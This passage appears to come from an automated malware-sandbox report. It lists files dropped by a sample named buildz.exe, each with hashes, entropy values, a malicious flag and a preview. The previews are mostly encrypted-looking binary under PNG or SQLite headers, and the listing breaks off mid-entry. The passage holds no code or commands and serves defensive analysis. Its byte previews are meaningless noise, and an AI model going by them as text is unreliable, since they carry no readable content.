                        Preview:.PNG.?j.63I..~.P...C.z.._.G.tKD..v..q[..(...=M.E....9...c'U..f.m......p.p.....*j.F<G..}.`.o...i...M..\Nq_.b4PTm....8.n..7^..y.mK....c.2..C....../..=..F...Zp...a....xG...T0........t...&V..yTVm..(.7(2........i+...s..r......[J[...Mg.....X............Q...q].:.....s..4G.m....w...X.....4g.U....R...q...."..&.7Z0...c.....<....w...lV`Jr.G.^.%w...;..)b..T.....n..q.e.1.5..`.K...}-....r.4$4..DB...<..,CA.v...|..+..._PUvL^.w.PB.M..O(..5^.~....|....d.......nq.n....#. .....#~}..ws.b........~[....K.q....*.y.)..$.../C...F.....8.i..T;^pg.q...t}i9..'z)....{...ba......E.c....D..&...L.j........<...}........8A}..2...../.......R_.....1M...o].B...7.;..1.p0_..$.-D9.t...1.V...n@....f....#.XF.F....R..h...3..?..../..+.O&....6^.o.(....Z.=...h....x0;..m8y..;.+..b.......c.}}...\3..*.....jP(.."...+.t....j.......T.s@..0%.K..,.`.O..JE..FO.7.K?...W@...b3.....M.H.idKk.C3._P)*.jA8.........sg...LxM..:/.,...R'.}>."..J.....=......(E.W.~..O...n.Y..y.E^....7.`.-.TF.Mx..1
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1547
                        Entropy (8bit):7.86362513296303
                        Encrypted:false
                        SSDEEP:24:mxfYnIr55vnHQzkg2Czs5cuNbQz5q7qrq9jB9j3CBY2/qrC2k7GbD:WYG5Hng2CI6AbcNW9vjyBj/qGp7UD
                        MD5:41E84010D7FFCE2ED3027A07542096C3
                        SHA1:05018587CB743E3BDA8C12AD1DB914E3E92C5A0F
                        SHA-256:58B45FF9B8400A189948BDC3A9287F5071ACD79A3281EA9899FEC1ABDCE03515
                        SHA-512:4EB3A436BE81D69B61010406358EC6CAFE5C51F68EB7F9C139757022104A11C4348AF523CCD1978BB9F86665733B92256AA828FF1A7D9FBCE5394C625451A7CA
                        Malicious:false
                        Preview:.PNG.e.9.2v..K...~Sk...........2r......O.....P...?.P......~}.K..>.u/....9..+]h..q.(....'..SZlK?).P...(......k...&.&.....F3.[z.w..kZ.e_...#.*....t..%WN..z....4.........~...Li``..s.........IV....;W.z..B..<..$...g.........>$%....V...?C.../....I].w.H ]{A.....F..7...}...6..]..i.......a.^....._.....J..d..i...7u.d.j.gO.z...~..!.+.yA..6/......r ..4.....b.!.?>..?.\|...Bu..% .]-{jJd.JT.......b*O....yabe.A...._UK}.v.E.....k.6U...9?.w.[i...].&9...C......q..3IVc-.4.:.x.....\.%G.........?........Y...[.Ep...TL......r....L...^!{a..$R....u.g}H.)G.v0.`.14..d....!...b.5.|e..y..H.th...M...WA...,X...o....<.........H....>..&3..j`...+0...Yg..8..d.t0h..h...r..T.....T.!d(!.81......6.....0..8...Fso..GUKY..Q_C.C.c.....~..*E.S...y.*...Qb.C..x...1+Epk.nm..OA.9..;R...T:...k.!..4|./o..H<T[..4.].L..._aJs..Sm..2........r.f."_0.......;B..m......&..xL.e.][4.h.X.Ep..H'.h.R8T.Y...M..v~.......>..p.\.....A8.......hc.-.).......2]...G.DQ5X..zTG.h.H.w..l[-..E.Y.....c6!g-.s....%.=
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4375
                        Entropy (8bit):7.95864291058413
                        Encrypted:false
                        SSDEEP:96:8aHG4jtEUaSZrspssfcfwmXOqpUEJWHwC1N71YA:8cZObSSzo2EJw71YA
                        MD5:DCAFFD7991E66DC62AE22B84E1446255
                        SHA1:41F7579C43CDCA04DD1A67423A65A1DCF6DC079B
                        SHA-256:7B8E5FC7587DCD5FEB7E048FE745065BE5175F3E5E7E4F61C8C8DEA049A07590
                        SHA-512:D3429F32BF9FC3EF5CC2FE2F664095DE7DA7AB7DA405C1ACF08D797E644728D0113E8F238313D6477F7FEF7AACD0F0550B999240AEAAA41F5ADF7312B887CE0D
                        Malicious:false
                        Preview:.PNG.j%..~.7g......9. g..i.J.... .a.=.T$.9..)..M.1...-)...Y.#..A.S........Swj.....O.....Q....Z.CM...L.6. s.z...f.@F.h;.KD....rOd.0!..>f..;gq3S..=......H.y..Q.v....."..!.>g....(U.^.6...._.i..'...:..Hr#..3.J....{i.x...w&.e.c6.q.....s........Vt....jD)e.4.u.l.......<K..<T.......j2....(......Ne...Q.60Y.-..p...W.....{..D.gW.Y.O. ..t.|.H.T<..X.O.a..&....Zw.Q.!..B(.&2.}.%...q.I.X..S.A=....\.. ..M.L/o..5.+...`.g...:..~.,...99.T..<.$w..."...<.q..U..YeV.y.=.#.;.....o^s....o.....;t...0.|c......y2....u\).l.;..T.F.kM..g!=.IdQi.....7.j..@..u.[...<.....6.../..4qn....yb..0..] ..A.}...r..!?..#Y%~[.....^zD..F.....C.E..k...@FQ.7.%..x.X..!.'.....Dw7v.w..C...A:...\...J..K.y.B-......^X..I.5!.+......].......Ks` ;u........[.)..D.~..D...e%.L...R'(9...&.a.............Q.!.........U.[nI;....sL.#...*G....{p.^.../".i.....].>+P.s>..Wu..B6X.....6.e2..6]..j....7.X...(.....L0..R..nyH...L.;.m....D..b}].mY...........bl.).q+...'7.{r'.2.'.F....4^.?.......".u..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1224
                        Entropy (8bit):7.841133957332003
                        Encrypted:false
                        SSDEEP:24:W0twrVjjAovRb986Y6Xp6YkgcMebsmReE4QJUGbD:WAwrxjAovh986YESgebbkE4QmUD
                        MD5:01DA963034844D18604D4999DF68207C
                        SHA1:B19E2FC7F718582B572107D712BB7781E0B17E9E
                        SHA-256:3ACF968E31F1552BFEB0089C222A5BDE45DA006FB3426589593C5C95BEDBB326
                        SHA-512:4F795A852BA87E34D288B523D49ECDB59D4BBF45CC9E6318B66A542451654B42DDD38DF3ABB3FD2F96F9C8ABAB8669DC9FC8C976650553794D650B32D5363BB7
                        Malicious:false
                        Preview:.PNG.>d...M...........S...XV..r.....j..h...D..8Im..J.Dy...T.~;...s.......5...x>...*..q....p.ro.Lw........Y.cK...[..]3}..vQ..>b....e...j..7.....,..eE.v+..MB{.,)W~..Z..@.......~.ZF)......zz.a.jA...o.I.=.&..UW.:..z..L=.X.L..9DE.}..##..O9...z.B=`..s....L..+...7..TXb...Q..W".8>...'x.Dg.mc.b4.!.R.....+.j8.uD.]..7...n.pP.HS3.\!..p...u... ..L.k.aP.~............VQ..af..B/.a.'.#Aq~UD?..;..l-..a.._.L6*^;...&,....3....G5s..R..:..G...._....!,Q.....0(...y.S.>5.c* ....G...<'.4.1.,e...^.....e..2.V..w..L....z.HY.N.<..b...$.X.w.b..D.-..v?..ov.&I.z...~...._4#H..>./.~..yXgM.DKu...PT...y....H...9.EOA.."..5....n...O....(.C......?.{09...Vf..X..k..z.Mh.....#19Tbh...$;.?z....8v.B....Z.|n5.p].%.....(9p.V.....6...g.s..Z.@........w\.....i.g...;.BL.....f.h..d...s..3|.^...."...N..h...U..J"........K...j.",......\....k.p........]..o....p.....b.....W. r..........N .-QnP...|2....<3.^.|..I..<H0n:s[.=.......H.. {..-...9..JP......H....z..C...ZS...b0.....1..}.....|..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1482
                        Entropy (8bit):7.849163433157819
                        Encrypted:false
                        SSDEEP:24:tijt6wNvV5HqWb5mDRgXA64QftoL+MENHRohlosnuUuZflpMxeeI3gZLgl97lGbD:tTCv/TmD4Am1k8Ko6ItpMxBSlUD
                        MD5:5C94FA10533160407AD9B466EFB925E4
                        SHA1:C710D4096D77BA6351291A4C4793EE5F1DFD4062
                        SHA-256:4004E52F84648CAAF208A6ADAE04DA047F97EC9C23B13E697E912F0359511A8C
                        SHA-512:D82D220D5C97E5E6084212AC5682880D57B6D7051ED93820656F728C1E18194FE04DA300FCF36F0820BD200316F444F0469315CCD0AA8AE28BCA6C65DC30080C
                        Malicious:false
                        Preview:.PNG..s_.+6..u.2Mn........4Y....E.T..%wm..".9.....;...."V..N...\.<.QlM.]..9..f..D....".a.E_..... I....D...+7....2U../....#k..;1...../.]j2_.P....i....%?5t.&...b..;...6...1.1-:.X.6B....E......2j).m..0n.........&L.*./.qM....}.f..T....k...C...$V..q..S.c.H......?..]....B... 0.n..-:<..\v...........Z........ ..e...j........:.J..8".S^..Ds#..d.U<...M..Y..l.hr....w..P>.=N)?.....E.$>F.7..z.ea..X1Q....-.|.D...#..B....... I.9X5....... j.(q..].X|.X.-q.W...U&..L>5...e.zeL^.g.g.TG....9.nq.o.........zmih0....{......"'...m{...G>.8~....9BV..>?.6m.g[....z+.;.V6....z.....r.....c.&2.$2.wc..?.....A.~..w....u..z..F.....:&.||}..w.}.S].N>5 ...J.\....~....5......-XEO^.......O.Z..v7.Jy...d0>1.+....d.."?;....Y..M+.........1.......U8.D.2.k....L...U..a...@H*.)5..Z...)q.?.1...q>..C..Z:.J..t.......(.}..c.......B+..a.."1....F<H.1..^....eW....1...r.C.v.F'..I..a%})..7........O...Y,7...GA.`.u..|.K.....<.......#f....6.c...k..M.....mY%_>A..uD/j..k.p.1<.]RG,.g../.E..S....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1634
                        Entropy (8bit):7.877771893822758
                        Encrypted:false
                        SSDEEP:48:nhFtVTAIoVUdwJIBNlfQ/mIP3EYYZC6SCUD:lVTLQOhw/mRm6SCA
                        MD5:CB54DD66AC3F2063CFA19F0B801606C7
                        SHA1:55D0BBA0A1413C79FB32441599EA3F507143DD30
                        SHA-256:A91FA9B7FFA976E65F7AD0D7A43E816EC3419EBC3F31C6C3CA4DBC21346758EF
                        SHA-512:D647F8A6F2CEEA3133CC7C5B382BEA57D888DD958010E5BA6A10A0A065225483484E7402FF87101B5A1DF97ED6C8B58647803CDA5354F3CF4400733536A3D8D4
                        Malicious:false
                        Preview:.PNG.s<B..Of.....G.Z7..X.&#f....n|.v)n.F.>.VKH.Q..I...........Rhm.,WI'......,.w.w..0>.....k..n..".J.0A.g..o...OB..$3H.\.6/..[.5&.#....9.._#.......0@[.%.O*.......^h.....rQ.../.+|..>B..9Y|..{.IB...J.H.2...M*C...._~.v,pe..e_......Q.3..`.o..V..}....Z.R......9.mld...U.x.....:.~.W_\..~v.,..Ha.$.<X,..VFl,.........lXP....|e...../....q.6Z.m.n..w..h.5z..>.a...7....N.4.\..v..w.u.j.e...$...l)v......C....p8'.1_}.i...$$C...v.n.,.F..^QpzAD.......>ay..6.....-.{'.m..M2....u).Hl...H@........].fo.1.]..0..d"".+.^0.....s..!a...cG3(h...c_...>...>.....{...kk:.%.'/.:7/.(.5..q...Q.F.9J).mN.....h........[I=.8.\.8+....C.3z.U.&y.CB..khe..m..s.!x.....u..&d+!.."Z....r.......P...{.f...?.=mB.g.!.]6b.3.......!.u.H.B.Y.@..J.8..*.....h..[.....;..(.{.(..u#.....*..I....2...&.Mv;..!O..........Mb.G.|.2..f..&.X.j?.....J.[........if.8O.Q;.J_.y...=.....[.0.NPv..q..wb.!b..,....\.Y.G......A6}..2v.ht"....XJ..?.....1Ja+..[.S.~P/../X......Y........+.........e.|J.......hMX..y$m...+.'r!..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1839
                        Entropy (8bit):7.891782195458269
                        Encrypted:false
                        SSDEEP:48:dRxzpyR4Z/0wlpSanagZV4I+p2Z8MrAT6pB1Gx7UD:Zp24Zh7Mg1EuT+7A
                        MD5:C8DB134F4303040228B4E63FFC7FE81C
                        SHA1:A98CD5AA620101B83934460D5E96EAC845B147D9
                        SHA-256:1BA39852A105AD596C419E487B8E24BD787D312827190539E4413D3D57677CEA
                        SHA-512:28A6D5546E14E4F194A1C674CAE40041BCB274B899CA8132E4B9010F9137151F341B9DBA1DF356995B14B11B87990A7426F3205374EFC2D80A1412EF43ACF31E
                        Malicious:false
                        Preview:.PNG....t_...._%+.U...0Qw.ct.2=.......1@.{~.<.....S.,.=Q......n.Q{.. KP..+.z..^....|E.d..Q}..z|.`.+9~....M7.v..%..J..ZR.3..h..Md. +.....+.].h..K.7.}+o.Q[9".....=...Ke.....0..c.G..M...Cb..D?G....j.....T...5..A6....I..jYg.}.;......5..M...o...C..T.5.`.......c?.7 ..........^....sa.....4.4).L.g.<..33....5.......e...d...%.\.5Z....G....C./f......@.....ckP.o....y4.=....*DC.7K...... ..<rP.H7..'..4.C...U<.z+.._.dIU..>....*3|...8...-.k}.-....,.F....E..{...1`..}..b.B}&9.0x..F....[......|J..J...I..r*w.G.tZ....?..KBg.....1P.\..,1.Cj.C.9Q..Q...,..y.&.>&...7.Z......%QG..<....2.6.A.....%.M..g........a.AXVq.je........^.......g.[.j.jQ<Fj...DxX......wPJ.;....*..hf....L._..9.7.{_.....7..9m..1....R...Ul.Z...Xi(.7MfF1..f.S...z.uz.8u.Z7.).5.e]|....l.....`..#..O....F..N.i...f}..7.......M.m.N.v..G......}6.1.S........._~Y.oe l...U$.P.i]cd..g.....9...9_A8..y.........C....)p......D.)$..o.!.7g&.J.W..=3Z..V.@.d-...t].....\.... .. Ln.._.;.WV..3..!.q..`8Z...=.F.._@..&
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2342
                        Entropy (8bit):7.9143975863959835
                        Encrypted:false
                        SSDEEP:48:bkXx0uraD5RD1pWjxLcDWOEZtivZx+bwsT5DIydL0PAHca/VVSgX5/MWmEaUD:InraD5F0pH+wT5DI6L0YHD/am5/pgA
                        MD5:15895D3AC0E046225958B8D87A5CC004
                        SHA1:66340104B2D7B7792C566A7CFEACCA59C6073DB4
                        SHA-256:443ECFCD4B87F03BDA402D75BC70C640FDA54AB66B89CFF412F36A1F789FD913
                        SHA-512:386D5E13DBC3B69F2C9FC42C3A0BBBACAE998A2C3AEE0CAA4DC2029812A65CDA6F60B2A28ECC2D3C16BE2478AD57C115C76804F58C7385691F9D4768CB9EA521
                        Malicious:false
                        Preview:.PNG...\ .wS..I.l..>.^~K9..~sf|.9@C......TU...K.<.u.$.S........m..z..B.....Y#^..e.eB{.{ 3).p..<.......:.=..p...P.Z..r.G..Y.O^n....e.}......2.5..w{vK...onO@Fg.H.x.../........e...Y.k>4S -n....H.....5.0L^.@......>..zz...]<.w.fo.2...s...?`$u..[p.y....4_.tgW.;#..yC..Z..-a>.}.`..On.e[.a.m.....$.X.=.....rD.`.;.&@....@.T/..9..s.t.KR..5.+........S..w.....T.xG..GZ.?..[..Wl...O"V)....b.V"V....;.9T.".....5}.C.R..v.f5....6b..D.8..}24.W{e.h2I.o.|....6.*^.::.......e9#...@...'..(M..0...>...M^.zZx.:.M.-...5.taiA..E..%.\M.x.U..`.+c...|.......A.wdj|3...f7.HKo%...|.?.....tK......;.f.v.W.DI|...j0|.......Q.+j..."0.. Q. ...3..We.t.5....v..0.sXPU.q;.0r.x5*l..C.+..*...LR..+X.zS......;3..G...uZa..9J....]....WTr...-.5?.h.s....!..<.R..(..4:.....d*.+...n[.z..v.8...r3..._.D.c.]f.F..S........|...h.G.FCs..`..+.7e...BU.!n.+NT..n...`.|0I...).6....Z....F.....`..z.r...I.a.B=&....\s.TMD.,.~...^W..V.."..l..M|...k4....f.{..J.!kF.8*..].....L..6W.....:....@h.G/G..$...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1569
                        Entropy (8bit):7.874968970826957
                        Encrypted:false
                        SSDEEP:48:A4ONzgedut1R1cdosQLRoVR5Csnfl5P1oG+ERpa9fUD:5UI3QQLRoTfNojwpmfA
                        MD5:EC5E5C13A3721EE1579AC640B7535A09
                        SHA1:A9CCCF16862C5AA45130602640F9E0C09045AFAE
                        SHA-256:6F4D6B9D8604F75D9CE4735D965EBB8C456A78198080C4FD2BD2FBE1F8305611
                        SHA-512:95BEB8849B805F2323389754D1A6463AD2723E29902229E20A147F54C44D53CC510E74791E22D355A36039CAAB85D225093E7820B1345535D3788A5057F03D0D
                        Malicious:false
                        Preview:.PNG...7.G>Sj.n.....(.+...Y*?..J.....8..v.o,y.J.A.......= ;M1..b"......1.ZgW..D...[..w.gWo.=....[..q...dEiu2 .U2.E./....?DP.7,.x.3Z.7j5....Ev.cS.>...2. z..A....@...I........$._.g.v..f...x*'.........}..,.v.?..S,..b..(x...{........p...S..U'C...I`..Y:....q.IK..........2.N....9...7.... ..I.n...:t.2c.Qq...i./.1..:4-.....}...Z.N..?.=.k.?...........'..0.....H...\.......GU.E....7XE.t.b.s<ku8.h..jJY.."Zd}.-Z.......=.e?+..,..g;6NG.0..,..k..P..G.E.......W.......V.YW.G*.W61..*...F......q...:{,.........dB~..C...g^...`Xf&...f&....X.V.......aW..N....i.rL.0..I._.k.........../.?-..W@...&..N..Brb.f..Q6..?.j\.@X)....^.......................p..."@~..;.\.>...DS%a.:....:*.:.|...<3.b.T....\.5fV..o..b.!).zu...f......y..5E1.K.bS..5u.3...T..yie./ImQ......0.xaJg.V.9.0....!0...xN..s..Mg.@.....H`...X'....7|..b.....b..8d.C...A...$&.o...m..........MnA.....<mA;OmB...."=a.+m$.S.EPf.B.s|kF.q.Xd.Un....;.G/..+.&.B?...3... 4......S.........u...O;.....a..2N.9. .
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4903
                        Entropy (8bit):7.958836759000151
                        Encrypted:false
                        SSDEEP:96:mmH8xriwwt+1ZgtPgOlPSCpUTN0lW2pNnM/W+Z9IhAzQgOBA:SriwwI1YHpTlWcRM/xhzQgOBA
                        MD5:3F048AB29AC179D3D7B8E81BBA447C12
                        SHA1:FE2C1D3898D6250AF06DA994C2DCF36D0D2673F7
                        SHA-256:77D8ECA54EED18AC0F3B472F66497515E6FFA90356453428A233DDB8F42C0972
                        SHA-512:1B67CDCE8718A1BA9F3E1929813127B10EEBD8294DC87FF553EB5062C569096F45F7D85FD9AD89CBCBD7084A593378F9FD30926FA33F580E30862E9412FA1D88
                        Malicious:false
                        Preview:.PNG..1tj.\/.+.kut.|.&.....7.B.P1.V).S.I..4.I......H.?.V....Pr....[.....e...0Y...b..-.'....F....>...<?...L..,.!..Q..._6..,y.F...D.QT.yo. .]K..3L.r.|.m..........->..y..(.8.].1.B#r.T...bIiSl..../.......OM:..S....z*.6..@...X....%N.pj.\N.......J.SP...8.(...."8.......>EJ....w..N..?.I`.....XG.A.A.<qJ_O...}...T.WDP....KEf...Wg........w8....K1n..4(}....N.+.p..r..U.../1a,+..0.*YA...B%..<q=.X]O..G._.Wu.....I..[....np....f...?&S..h...@.8....6..M......J.t.k..U....6..].......s........._sF.iW[...}>K]._e..y.5...[...w........../....+.0o..G..l..,.k.$..g.E...*.(v.}o.......}.....lT..%1Q.....x........s.Ka..aZ3...(c.........8.I.A.....y#..GA..h..Z..)...7.W..a....6n....a-'/.).$P. .w........e..|l.lkY.4.G.....tv.a...%....Q^2..r....ht`..:..P..4........h.!.5..(..V1)!.b..z...s.k.![..Z7{/...V..}..6.P....j.......)..-9\.n.dg..Z./.......Uz.......E.....CD..w........P.;.!pFf..`.[#..zk...V.....^m.(.....X....f..4..UD.!3...X.s[.O....I....$1#.J...........A...K
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1247
                        Entropy (8bit):7.826331035936498
                        Encrypted:false
                        SSDEEP:24:0Q+5Vn2O8Ikm6RhGgMo6EVpH3KAoM/SU+gZuy+25oSMTMR/suhBr+rlmtHGbD:0Q+iOZ/AAgMETH3BoM/V+gZuyXggRHrK
                        MD5:675D644D74A43F1E7E5B27AAC184A7D7
                        SHA1:C192F5E4C0B1D619085FEC09EB2FF3BA8C85738D
                        SHA-256:5E6A1451BC0BDC290A9CF745A1FC52422CC80C05C5723D10A3F0CEA64EB2DF2D
                        SHA-512:1FC27364D04CD45D4E779236D9C5D6048E9D5C72984E808DDA5113410F52DD583A28F710C6D3DCB05A6376D60C40F535FA433CCCC7DCB30311257CD3E49BF88A
                        Malicious:false
                        Preview:.PNG.........N..q.......2%..uxY.+...e).D.w.D..f...lb.....S:., !hq...u_D$.)S......k..?+1&7U.De..:G.W.*+...........9,./...k....mN.>...=;h.}......\.c.d$.M.0...=;2.=a...(....f......=1...e...v......h....)..aVi...m.(x.\.....@.+...q....sMZ .jp{.0g..eE.....f....z.[^.h.{g..84.}.\.v.)......xym~.:).o/Q..d.wT.r..'LBV...B#....!.e.....}..2..A:.FpEl)'.>+....l...F..=hA.~...V...%......%.pF.l....S^4Y-.,.._.._>k.u .g.......+c...E.v......9M...g..e....'F..<.....`SH.Y.........jR).a...)..*8y..$.T?..H}~..*...F...eN.H&.T.CX..3D.@....AT..1%...u."I..K.4e+...=..A.<.6.UX/~n....f.....J9o.. G7.....[......a.-H..dc7C,J.w.Sl..C.cz.....9....x..o..|.Rtg...h.@|-m\g)q.kbtb.Q...kVl..N0...+...m......".....#cg.....z..!.........l.M?....BI.}.1O.........P<s..dB.$?..m..3....Zd.... ..!D..y......~.Cv..es|=..,..T@...G...=.Qc.Z.@.{.B..O;......U...Y.n.....+.K..evi.?..ES..E...|B._.S6Mr..zv..'..c..33.......c...:?....-.x.\....5`3.....zE..5..9....z..pi|.,._....{7..(V..+..!rS.&
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1422
                        Entropy (8bit):7.849791272323281
                        Encrypted:false
                        SSDEEP:24:fXBxOOLnQBL6f1+sBV9Y0rhJc/8RnbKJQPuXCk6MjOunwTx5fTRBkD1nQtR9GbD:fRxbLnQI3j9bho8xbMgCCFMjMTrfTRB2
                        MD5:7AA19F1675342E44372217BEE5F3B693
                        SHA1:0CC714EC7371A50751B96F99CE094F3E5E62BADE
                        SHA-256:DA318BCCDD98D9E2AE95D819DCC8297DD1C74F3815833AF627C17629756BF8A7
                        SHA-512:0F59159EEBFEA7FF3FC5789863C8B29CB7AA7EC503032BD407857F138E18A89B5DCB41F7579AD979BE78BF088A97F68C0768FCA9E56AB75EF40C78FDA6B48E34
                        Malicious:false
                        Preview:.PNG.o..85....nt'?.-...h^.J.*.;..0Fx.w.$.S KI.Y..r}L.h.>..b>..i.m@..M....Lq.T...V0eD9.Z0.7.'.d.Q.j..._. ....e>.w ...S>f.vk...+.^Bc&.rR-.V....B.Z.`..SL.Z.LJd.4.... ...s..*T.FNSAqEG..e.../gj.....]...=..T.7...~..1W..Y..>.k...6......I..{......j.-W..G. #on...O.....P...."._..7..H...wt..Y<.!.t...o..n.... .$...0I....R....X....x..8.W8COi.U.E..B...@.".M.*......By)..|.~i..U..5.F..v>g.Q.......fp0..Hl..7D..d3..._...T3.....S..%2(...?..M.Y......RL...7....}.0........P........R......&..>CH.6.$97.......j.......*....gx...D_).f.......i..l..K...B.....m....<..p3.3...0l..b>S_....?...{.T?.....=. ..<p.a......-fy....`...!Iw...D..hl\..J....1`....4...d|.et.7....D....'..[.VT.C.......e..W.p..aM..#g..~.!d..@..CK:......6.......:.0.'.w.R...Q.p.9...)..9....-..........$....S..O.4.4..Z.`.Z.s..."..<.6........O..`._@......M.,.D......Ra..F2".l.U2.r..N.....E0..k.&...F?~6.!.Ix../_....V.!(..x.....?b..H.R......;D.x..^..Z.3....D0<...UTT+....D+.."..[.f^.?...<..rz..o.....}..2...b..."*]
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1566
                        Entropy (8bit):7.869521455016675
                        Encrypted:false
                        SSDEEP:24:0CBOxfZzMB3Kr8+ke8Cpv+35oyK9HGmWrmaRCiS49Epv238FC28BhDvGbD:0IIxzk3q8G8COoX1GmnaHFuXQhLUD
                        MD5:62590BF4B856C95CED72A312904A951E
                        SHA1:421D8B72F6D39BBA62BDDD8413D2F5A154DE86A4
                        SHA-256:1F8D44551101A5E34DD8AFBD170097996175A0F7BA52BDEB3F25F37BB07DE45C
                        SHA-512:4FD77C47B8213DF24C1E8F68814B2D67BFA144169FF95CF220E1D3162C9853E72993E24FFD25A91384CD9329B6C164450B5F230D820E9904A11B152922BD12DE
                        Malicious:false
                        Preview:.PNG....+.......1.q#_.$."..-......1K..7|..e..c..UF..$....=F^`.Q......F...8.B\......J)..i.q=.p...*4OM........b..3.a..cc(........&hFs..5...q..i.d.......j."}...O*O*|..P.1.h..,.. ..B..,..CZ.0eb.X.2\v..O........J_..<.U...M..5.$."A.....X.....<.`.%9.w..e.%..'....ZN;.sY.@..qWjc...x4.S^B.q.'DS....].I"...#.{9l1n..;...vw.",C[pam.UbDB*..KT,...o.h....8.a.....V..%.z......... ^..d...j..pzD7Z.-..L...N.|...$.f._...s.-0.....].O?...M.2...w.|.E\.Wn\.y#@-x..`N.h|...Q...n...z.......R..I+..'`......9_.#}$.l.X;~...........i.S...S.y^... .hM1......AZ.........l..=M...-'.../~fEB..I.G..R...!<f}>...,."..m....[-.".....R..Y.z4.t...J.3k..).-E.j...<..'...J."..6..C.U.u.}.|.8.gH..[......L....k%[c....d....uVg..w.C.GpP..0....=.$k3M.)W#........>.z...aa.3.....o...@<M"..qU.~g..&}}R...m.......X.?....6.6..<..|c..X..iT......../...k....}8.h.....G...W.....D.....%l"ld.Q.u....S.f.~.Z.......&....8i/:R.L\zxcO..g.j..1..J3.........Ke..C.[|.R.w......gBa.e../..y.M...:).TEs'....q.yfuL.PK,..Z.^..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1802
                        Entropy (8bit):7.884471370737971
                        Encrypted:false
                        SSDEEP:48:Yed38Djl3PNt5e8AVNyrxn1V3Q1OIVt9/LUD:3AjxPLRAvIn1VUVt9/LA
                        MD5:84209F6645D709D217EA62036A3F4386
                        SHA1:3CF79F979CB812D024CA5F228EE6AFDA5D4EDDFA
                        SHA-256:D856394121C7D0B1B47A5DF897D80744FA48B79D6274F7587E360165118654B6
                        SHA-512:66493D060C2718358DCD6F74A460B4933917C2793C17422368F753CB596B059E326D192D4F00EEA7ED3C1CD6DDA8FE0B82AC45DB0529B77F5267059F683D3413
                        Malicious:false
                        Preview:.PNG.Od....8'.L..$.A..m..eQ]...B..^...)....<.|z..b..~ox.C.?..U..DK~.....,..\.....Cg#?NQ..vj.$.t.P.}.W.(...!..7:.X.......X.Y.N8..C.....E...~fB/4.4....H$1\...X...p....Nq...]..#.1.4...?d.....d..5}.0.W.4M..no..[1....N[k.Y.....4u.X.G~F...k..._.LM.x+6..E.t...[.No......m....lb.......'..L._i....@.J..(.u}~....<[(.$..UnHK.=.V:.<...^.x.\.Tn.;.P}.."o.+r..k.;b.....=k......C.IN.@...8[.'..'.-+&...D(..h.......T@......XOJ..zd...".p.p5Q..0F:6...<&T..g.....+t...O..&w.....j.P#.z+.A.....O.v...Q^.M....EQ5...}..a.6...j.;....d.,.U.......".G.!.7....!L>.?..?...K$..3.8.-X_NW....ZZ......~TVR.i.X..F.V.X.}.j......tz.."f...&g.....\.P....f.P{h-..Z.q....vZ*.l.m..%2....TQ..f2......;n.i3..7.J..4h;<.. .[.r%.....3......N.Z...xT.*5aY..^.4"...]=.[.t.E.bF......]_g....+.-?....HfM:.....P..%.T.1l#...V.~......`..N.n.....Y|./.....l\0N..W.../{..P.6 ...G......fek..=d...R#.......K.9.q...d.M...{...w.b.E.{.....Q..G..ka..n%.;k.S1...+.u.l6mX`.u../L.^Fx..j.S}J.^....]Q.......b.%..W...3..I..UU..j.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):29006
                        Entropy (8bit):7.993249274248463
                        Encrypted:true
                        SSDEEP:768:SY/GNcGBljaRWZonxP1v9AXLKxTEbXx65zjjkPA:StNcKlUWZq9AX+xTwujIPA
                        MD5:A65AF238C93E6C06B7B57D6641E8BE2E
                        SHA1:D60D8B9728F7D534688C8A9B4452F9EEEF523DFD
                        SHA-256:832772D907DDFFE056C04A6537FAF486AE66AC9A704FDBF93E4216A129514E7F
                        SHA-512:1E48DAC60B2605EFED62817F226D39E26C4BC83C3D9A22D30759F5CCD9293931C9C61425E1234C352B0DB6C6BD17875E389E7A9D50748C36B8245417C6718CA9
                        Malicious:true
                        Preview:SQLit.....x...c;..g.E~.....S..Y[`...*....9.d..]....l.J..... F..{.l.%vS......k.R...E..+7.+.....D.9...@.F....kw..Z8..*...l{..(....Y.x.H..U....v...;0NP..sn.C^I...............+.9.....w...i..~...}gW.. ..C.>..1....g...w.].x&5..*......Q=/..72jH......w.T...B...%.......CF... ....EWU|..L.90.P....+....]&ld........:*+.".@.v'.&.jij"..:^V.+._..XN._..u......[.s......A.k....!..N.$.3H..._.J}..{S`01\......@X..T.$..3.MP.a.-...^t..9..P.fI.ke.o.#.j?l.....%q..W/.....u2Lk....'!...G.?......D.......LY.....g...!....,y!T...Y...q..E..s..q.......<Us:...^...y.w..!\oY...j.B..l../+.%.B..%.]..=..9.......t....w.w.C.G....~@.I..2/..XQ...&.[.0u5.d.(J..<...M.g.`wz.8.x7..s.p*|Q...=..zW..%...._.....|.o.NP.#^}.....e(...vj8..G....vT.|l.h.....3.....?.....Bl..@.=..8i...?.:..AW..E...2.4..AOe;|.......u...-!.j.i.`.x....kqw@.f..BN....|.>.=..F_.....4..ftY...-]S.3...U....<I.!.,;...|zE...s../.M..`}......y.}..l........C.^d<...K....d..*..<.T..{.*....o.DgB...,.{.<...^...h..bP..~...t.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):58432
                        Entropy (8bit):7.996837209884564
                        Encrypted:true
